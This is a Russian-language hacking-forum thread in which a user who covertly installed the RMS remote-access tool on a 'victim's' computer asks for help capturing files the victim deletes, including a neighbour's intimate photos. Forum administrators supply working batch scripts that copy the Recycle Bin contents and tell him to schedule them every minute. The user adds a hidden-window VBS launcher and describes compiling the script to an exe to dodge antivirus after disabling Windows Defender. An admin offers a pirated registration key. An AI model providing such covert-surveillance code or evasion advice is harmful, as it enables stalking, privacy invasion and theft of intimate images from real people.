Подмена корзины на рабочем столе ПК

Тема в разделе "Трояны и шпионские программы", создана пользователем Принц Птица, 14 авг 2014.

↑ ↓
  1. Принц Птица Пользователь
    Принц Птица
    Ответить в чате

    Первый уровень

    Регистрация:
    30.07.2014
    Сообщения:
    32
    Симпатии:
    24
    Пол:
    Мужской
    Репа:
    +24 / 0 / -0
    Не знаю, в правильном ли месте я создал тему для вопроса, заранее извиняюсь.

    Помогите мне решить проблему, если это возможно. Я установил RMS скрытно, но я не успеваю воровать данные, т.к. пользователь почти сразу очищает корзину с данными. Есть ли такая возможность, чтобы подменить жертве корзину на другую корзину, идентичную по внешности функционалу, но чтобы эта подменная корзина не удаляла ничего, а лишь делала вид что очищает её? Если есть такая возможность, то подскажите как это сделать или дайте ссылку, буду очень благодарен.

    И, еще один вопрос, касающейся этой же корзины. Чтобы удалённые файлы не переполнялись в скрытой системной папке, было бы не плохо если была бы такая задача, чтобы она могла самостоятельно очищаться через промежуток времени, например через одну неделю, для того, чтобы жертва не смогла заподозрить, что в локальном диске осталось меньше свободного места. Может быть как то можно это всё сделать через батник? Или подскажите возможный альтернативный вариант, если это также возможно. Спасибо!
     
  2. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Не лучше-ли копировать из корзины в какую-то другую папку временно ?Не въехал!!!

    Например через какой-то промежуток времени проверять есть-ли какие-то файлы в корзине а потом копировать их во временную папку...

    Делать это можно и батником, потом добавить задание в планировщик + и удалять файлы тоже через какое-то время в планировщике...Не въехал!!!
     
    • Мне нравится Мне нравится x 1
  3. Принц Птица Пользователь
    Принц Птица
    Ответить в чате

    Первый уровень

    Регистрация:
    30.07.2014
    Сообщения:
    32
    Симпатии:
    24
    Пол:
    Мужской
    Репа:
    +24 / 0 / -0
    X-Shar,
    X-Shar,
    В том то и проблема что не могу копировать из корзины в другую папку, т.к. в RMS он может переименовывать, скачиваться, запускать, а удаленно чтобы скопировать в другую папку - не получается через менеджер файлов, почему-то этой функции нету там.

    А какой код в батнике должен быть, чтобы он мог это сделать автоматически? У меня есть возможность запускать батник на компьютере жертвы, но основы знания написания батника - у меня нет, к сожалению.

    И у меня не всегда есть доступ к компьютеру по разным причинам, поэтому даже если бы я мог переносить временно из корзины файлы в другую папку, я бы просто напросто не успел бы это сделать, жертва очищает корзину почти сразу, редко когда забывает это сделать, поэтому автономный вариант копирования без моего участия единственный выход спасти данные.
     
  4. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Есть несколько вариантов:

    1)Просто копировать файлы во временную папку, а потом удалять, единственное я не помню в какой папке располагается корзина, приведу пример с произвольной папкой:
    Код:
    del “f:\backup\old” //q
    rmdir “f
    :\backup\old” //q
    rename “f
    :\backup\new” “old”
    xcopy 
    "C:\docent" "f:\backup\new" /s/c/h/n/y/
    По мойму так, при втором запуске переименовывает каталог new в old, создает заново каталог new и копирует файлы. Т.е. батник дает возможность хранить “двухдневные” бэкапы...

    2)Использовать винрар, если установлен, тоже самое:
    Код:
    del “f:\backup\old” //q
    rmdir “f
    :\backup\old” //q
    rename “f
    :\backup\new” “old”
    mkdir “f
    :\backup\new”
    “C
    :\Program FilesWinRAR\Rar.exe” a -m5 -ep -dh -inul p123 ARHIV_DOCENTA C:\docen\*.*
    Данный код сделает запароленный архив...

    C:\docent нужно поменять на путь до корзины...

    Путь до корзины в зависимости от системы, на хрюше это Recicled по мойму, на остальных не знаю, поиск гугл...Отдыхай!!!
     
    • Мне нравится Мне нравится x 2
  5. Принц Птица Пользователь
    Принц Птица
    Ответить в чате

    Первый уровень

    Регистрация:
    30.07.2014
    Сообщения:
    32
    Симпатии:
    24
    Пол:
    Мужской
    Репа:
    +24 / 0 / -0
    Я попробовал у себя на компьютере по первому варианту, батник срабатывает, но ничего не происходит, или может я не туда гляжу. В общем вот какой код:
    Код:
    1. del “D:\backup\old” //q
    2. rmdir “D
    :\backup\old” //q
    3. rename “D
    :\backup\new” “old”
    4. xcopy 
    "c:\$Recycle.Bin\S-1-5-21-3477554348-3782734642-2060518751-1001\" "D:\backup\new" /s/c/h/n/y/
    Где я допустил ошибку?
     
  6. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Кавычки не нужны, вот 100% будет работать:
    Код:
    del D:\backup\old //q
    rmdir D
    :\backup\old //q
    rename D
    :\backup\new old
    xcopy c
    :\$Recycle.Bin\S-1-5-21-3477554348-3782734642-2060518751-1001 D:\backup\new\ /s/c/h/n/y/
    pause
     
  7. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    А я вот что-то не пойму, зачем отслеживать корзину, или специфика какая-то, первый раз такое слышу что-бы кто-то корзину именно мониторил, что это если не секрет ?Не въехал!!!

    А так рекомендую сделать два батника:

    1)Будет копировать

    2)Удалять старые папки, его лучше вообще вручную запускать...

    А первый батник нужно как-то добавить в планировщик задач, чтобы он постоянно копировал файлы из корзины, раз в минуту к примеру делать запуск !
     
    • Мне нравится Мне нравится x 1
  8. Принц Птица Пользователь
    Принц Птица
    Ответить в чате

    Первый уровень

    Регистрация:
    30.07.2014
    Сообщения:
    32
    Симпатии:
    24
    Пол:
    Мужской
    Репа:
    +24 / 0 / -0
    Спасибо, всё работает замечательно. Но возникла следующая проблема, запуск .cmd палит своё присутствие. А в корзине могут быть огромных объёмов файлы, поэтому копирование будет происходить не слишком быстро, окно батника всё же сильно палит. Я попытался в гугле поискать код фонового режима, сколько не пытался сделать, у меня не получается. Вот код:
    Код:
    01    rem Запуск батника в скрытом режиме
        
    @echo off
        
        rem Готовим рабочий бат
    -файл
        
    echo dir /s c:\^>log.txt>wait.cmd
        
        rem Готовим файл запуска в скрытом режиме
        
    echo Set WshShell CreateObject("WScript.Shell") >start.vbs
       
    echo WshShell.Run "cmd.exe /c wait.cmd"0false>>start.vbs
        
       rem Запускает на выполнение в скрытом режиме
    конца выполнения не ждём.
       
    cscript.exe //b //nologo start.vbs
       
        
    rem Стираем временные файлы
        del 
    //q start.vbs
       del 
    //q wait.cmd
    Вопрос у меня в следующем, можно конечно и двумя батниками, однако у меня есть другая находка идеи:
    Убрать корзину с рабочего стола и заменить её екзешником, однако не знаю как сделать, чтобы он менял вид как папка, корзина пустая, а когда корзина полная. Можно было бы собрать такой экзешник, который бы пользователь когда решит очистить корзину, нажмёт на подменную корзину и сработает батник копирования и одновременно с этим запустит ярлык настоящей корзины. Но, опять есть сложность, что не исключено что пользователь вместо того, чтобы открыть корзину, просто нажимает на правую кнопки мыши и прямо из ветки меню очищает корзину. Было бы не плохо если можно было на экзешник настраивать ещё и меню ветки, где очистка корзины также бы выполняло команду копирования.

    Хотя, конечно, пока буду пользоваться этими двумя рекомендованными батниками. До тех пор пока не смогу добраться до способа заменить этот вариант на подмену корзины. Хоть что-то уже имею и это для меня положительно идёт в мою пользу.

    У жертвы есть соседка, которая приходит в гости и с телефона копирует интимные фотографии и видео в компьютер, и загружает своему любовнику в личку. Потом она просто удаляет эти файлы и чистит корзину. Для доступ к данным не имеет никакой ценности, но как ранее я говорил в ответе на тему скрытой веб камеры, что это мой огромный интерес без вреда и корысти незаметно следить и наблюдать. Это моя ранняя детская мечта, которую пытаюсь осуществитьMy mind смех-смех!!!
     
    • Мне нравится Мне нравится x 2
  9. Принц Птица Пользователь
    Принц Птица
    Ответить в чате

    Первый уровень

    Регистрация:
    30.07.2014
    Сообщения:
    32
    Симпатии:
    24
    Пол:
    Мужской
    Репа:
    +24 / 0 / -0
    Проблему скрытного запуска батника решил программой Quick Batch File CompilerОтдыхай!!!
    И, почти, не обнаруживается антивирусами в VirusTotal обнаружено только 10 из 54, что в общем то очень хороший результат для меня. Однако во время создания батника в екзешник, защитник виндус ликвидировал его, пришлось отключать его. А после созданного екзешника больше не обнаруживается защитником, или реакция у него очень медленная, мой добрый антивирус антимальваре тоже не обнаружил егоbig010101
     
  10. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.181
    Симпатии:
    11.095
    Пол:
    Мужской
    Репа:
    +11.243 / 47 / -6
    Jabber:
    Skype:
    А мне больше нравится Exe Script Converter.Можешь скачать на официальном сайте (или тут) и зарегать этим ключиком.
     
    • Мне нравится Мне нравится x 2

Поделиться этой страницей